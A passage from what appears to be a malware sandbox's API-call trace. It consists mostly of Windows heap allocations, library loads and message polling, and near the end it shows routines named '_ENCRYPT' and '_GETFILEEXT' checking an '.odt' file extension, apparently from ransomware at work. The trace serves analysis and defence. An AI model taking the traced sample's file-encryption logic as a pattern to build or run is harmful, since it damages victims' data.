returned 68 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8ee038 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.969] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.969] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.970] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.970] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0179.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0179.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0179.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0179.971] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0179.971] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.971] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.972] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.972] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0179.972] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0179.973] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0179.973] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.973] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0179.974] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.974] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.974] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.974] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0179.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0179.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0179.975] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd6f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0179.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.975] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0179.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0179.975] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.975] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.975] CloseHandle (hObject=0x120) returned 1 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.976] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.976] FreeLibrary (hLibModule=0x75990000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0179.976] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1b0 | out: hHeap=0x8a0000) returned 1 [0179.977] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.977] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0179.977] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.977] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0179.977] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.977] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0179.977] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0179.977] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.977] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="odt", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".odt", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.978] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0179.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0179.978] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.978] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.978] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 